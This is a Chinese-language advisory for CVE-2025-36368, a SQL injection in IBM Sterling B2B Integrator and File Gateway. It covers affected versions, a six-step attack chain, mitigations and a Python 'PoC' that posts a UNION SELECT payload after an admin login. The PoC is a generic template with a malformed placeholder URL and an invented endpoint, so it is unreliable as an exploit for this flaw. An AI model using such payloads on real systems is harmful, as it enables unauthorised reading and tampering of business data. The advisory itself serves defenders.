CVE-2025-36368 IBM Sterling B2B Integrator SQL注入漏洞

漏洞信息

漏洞编号

CVE-2025-36368

漏洞类型

SQL注入

CVSS评分

6.5 中危

攻击向量

网络 (AV:N)

认证要求

高权限 (PR:H)

用户交互

无需交互 (UI:N)

影响产品

IBM Sterling B2B Integrator, IBM Sterling File Gateway

漏洞概述

CVE-2025-36368是IBM Sterling B2B Integrator和IBM Sterling File Gateway中存在的一个SQL注入漏洞。该漏洞影响版本6.1.0.0至6.1.2.7_2、6.2.0.0至6.2.0.5_1以及6.2.1.0至6.2.1.1_1。攻击者需要具备管理员权限，通过构造特制的SQL语句发送到受影响系统，从而可能查看、添加、修改或删除后端数据库中的敏感信息。此漏洞的CVSS评分为6.5，属于中等严重程度，攻击向量为网络，认证要求为高权限，无需用户交互。机密性和完整性影响均为高，但可用性影响为无。由于该漏洞需要管理员权限才能利用，在一定程度上限制了其危害范围，但一旦被利用，攻击者可以完全控制数据库，可能导致企业敏感业务数据泄露或被篡改。

技术细节

该SQL注入漏洞存在于IBM Sterling B2B Integrator和IBM Sterling File Gateway的数据库交互模块中。漏洞成因是应用程序在处理用户输入时未对特殊SQL字符进行充分过滤和参数化处理。攻击者（具备管理员权限）可以通过Web界面或API接口注入恶意SQL语句片段，利用数据库查询语句的缺陷执行未授权的数据库操作。成功利用此漏洞后，攻击者可以执行以下操作：1）使用UNION SELECT等技术在查询中插入恶意SQL语句；2）通过堆叠查询执行INSERT、UPDATE或DELETE语句；3）利用SQL语句执行系统命令或读取文件系统（取决于数据库配置）；4）提取数据库中的用户凭证、配置文件和业务数据。攻击者需要通过身份验证获得管理员权限后才能发起攻击，这要求攻击者首先通过其他方式获取有效凭据或利用其他漏洞获得高权限账户。

攻击链分析

STEP 1

步骤1：信息收集

攻击者识别目标系统版本，确认其为IBM Sterling B2B Integrator或Sterling File Gateway受影响版本

STEP 2

步骤2：获取管理员权限

通过社会工程学、暴力破解或其他漏洞获取管理员账户凭据

STEP 3

步骤3：构造恶意SQL payload

攻击者构造包含SQL注入语句的特殊请求，如使用UNION SELECT或堆叠查询技术

STEP 4

步骤4：发送恶意请求

通过Web界面或API接口将恶意SQL语句发送到存在漏洞的数据库交互模块

STEP 5

步骤5：执行未授权数据库操作

漏洞被触发后，攻击者可以查看、添加、修改或删除后端数据库中的敏感信息

STEP 6

步骤6：数据窃取或破坏

攻击者提取敏感业务数据、用户凭证或修改关键配置，可能导致数据泄露或业务中断

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import sys

# CVE-2025-36368 SQL Injection PoC for IBM Sterling B2B Integrator
# Target: IBM Sterling B2B Integrator / Sterling File Gateway
# Authentication required: Admin privileges

TARGET_URL = "https://target-host.com SterlingB2B/..."
USERNAME = "admin"
PASSWORD = "password"

def login():
    """Authenticate to the target system"""
    session = requests.Session()
    login_url = f"{TARGET_URL}/login"
    data = {
        "username": USERNAME,
        "password": PASSWORD
    }
    response = session.post(login_url, data=data, verify=False)
    return session if response.status_code == 200 else None

def exploit_sql_injection(session):
    """Send malicious SQL payload via POST request"""
    # SQL Injection payload - extracts database version
    # Modify payload based on target database type
    exploit_url = f"{TARGET_URL}/api/vulnerable_endpoint"
    
    # Example payload for UNION-based SQL injection
    payload = {
        "parameter": "' UNION SELECT NULL,version(),NULL,NULL-- "
    }
    
    response = session.post(exploit_url, data=payload, verify=False)
    print(f"[*] Response Status: {response.status_code}")
    print(f"[*] Response Content: {response.text}")
    
    return response

def main():
    print("[*] CVE-2025-36368 SQL Injection PoC")
    print("[*] Target: IBM Sterling B2B Integrator")
    
    session = login()
    if not session:
        print("[-] Authentication failed")
        sys.exit(1)
    
    print("[+] Authentication successful")
    exploit_sql_injection(session)

if __name__ == "__main__":
    main()

影响范围

IBM Sterling B2B Integrator 6.1.0.0 - 6.1.2.7_2

IBM Sterling B2B Integrator 6.2.0.0 - 6.2.0.5_1

IBM Sterling B2B Integrator 6.2.1.0 - 6.2.1.1_1

IBM Sterling File Gateway 6.1.0.0 - 6.1.2.7_2

IBM Sterling File Gateway 6.2.0.0 - 6.2.0.5_1

IBM Sterling File Gateway 6.2.1.0 - 6.2.1.1_1

防御指南

临时缓解措施

在官方补丁发布前，可采取以下临时缓解措施：1）限制管理员账户数量并使用强密码策略；2）加强对管理员账户的监控，及时发现异常登录行为；3）通过网络隔离限制对管理接口的访问来源；4）启用Web应用防火墙（WAF）规则检测SQL注入特征；5）定期审查数据库访问日志，发现可疑查询立即告警；6）对关键业务数据进行离线备份以防数据被篡改或删除。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-36368
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-36368
3 Details https://www.cvedetails.com/cve/CVE-2025-36368/
4 VulDB https://vuldb.com/cve/CVE-2025-36368
5 Link https://www.ibm.com/support/pages/node/7263324